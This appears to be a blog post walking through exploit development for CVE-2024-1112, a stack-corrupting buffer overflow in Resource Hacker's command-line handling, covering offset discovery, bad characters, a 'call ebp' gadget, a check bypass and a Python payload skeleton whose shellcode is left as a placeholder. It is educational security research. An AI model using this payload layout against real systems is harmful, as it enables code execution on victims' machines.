CVE-2024-1112

Aug 04, 2024

3 minutes

Exploit_101

Exploitation, honestly I was running away from this field of reversing. Its like a curse and one day every reverse engineering researcher will come here sooner or later, this is inevitable.
Also i wanted to diversify my blog : ))

CVE-2024-1112 is a heap-based buffer overflow, but when this vulnerability was first published they wrote that it was SEH based…

cff

If you want to test. Here is product and version. You can find it from my github.

Entrance

I couldn’t find any PoC but some articles mentioned that it cause of command line parameter. So first of all we need to generate a buffer overflow pattern. PatternGenerator

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3
Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7
Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A

If you look at the pattern a little bit closer, you will notice there is no same sequence for 4 bytes. So if we see our parameter’s 4 bytes anywhere, we can determine exactly where is the overflow.

Debugger Command line -> ResHacker.exe [pattern]

Overflow

exploit

Yup this is part of our input(0Aj1). So lets try it, first 268bytes will be padding and then we will put an address. Such an address to execute our shellcode. It may be “jmp esp”, “call ebp” something like that because our shellcode at the stack.

exploit

We got some references to “call ebp”(FF D5) but we need to chose carefully. Because there is a check for input value.

BadChar

exploit

Look it that small thing, so cutee. Values below 0x20 are not allowed as parameter. So I will chose higher ones for all bytes. Let’s continue with “0x75D15145” but it can change at every restart just be sure to that address point to “ff d5” opcodes.

Check Statement

exploit

EAX point to stack and it takes 4bytes of our parameter’s shellcode part.

268bytes(padding) + 4bytes(address) + 20bytes(shellcode) == 292. 4bytes!!

Program will take that value and check it for jump condition.

exploit

Here is a problem. EDX contain opcodes we gave it and it is a reference for this part of code. It assign the 4 bytes behind the 8 Bytes to ECX. Then ECX assign to a .DLL’s address space. Of course it is a violation to write another program’s address space. So we need to bypass this statement. There is “JL” condition and if it taken, we can go away. JL check for “SF” so if we provide a value which is negative it will set “SF” then JL condition will be taken.

How we can bypass statement; We must give such an address that the value 8 bytes behind will be greater than 0x80000000. Because after dec it should be higher than 0x7FFFFFFF. Let’s find it. (0x75CA8D7B)

For now our payload;;


padding = 268 * b"A"  
jmp = b"\x78\x8D\xCA\x75"       # Address to return value -> CALL EBP
check = 5 * jmp                  # 4bytes are important at 292.bytes rest of them isn't necessary
shellcode = "...."

Final

exploit

“ret” instruction get the address from top of stack and now our stack will give us our padding’s last 4bytes so we won’t add 268bytes padding, 264 will be okay.

Don’t forget 292.byte is important so if we decrease padding size we need to increase “check” variable size exactly the same size.

Payload;

padding = 264 * b"A"  
jmp = b"\x78\x8D\xCA\x75"       # Address to return value -> CALL EBP
check = 6 * jmp                  # 4bytes are important at 292.bytes rest of them isn't necessary
shellcode = "...."

exploit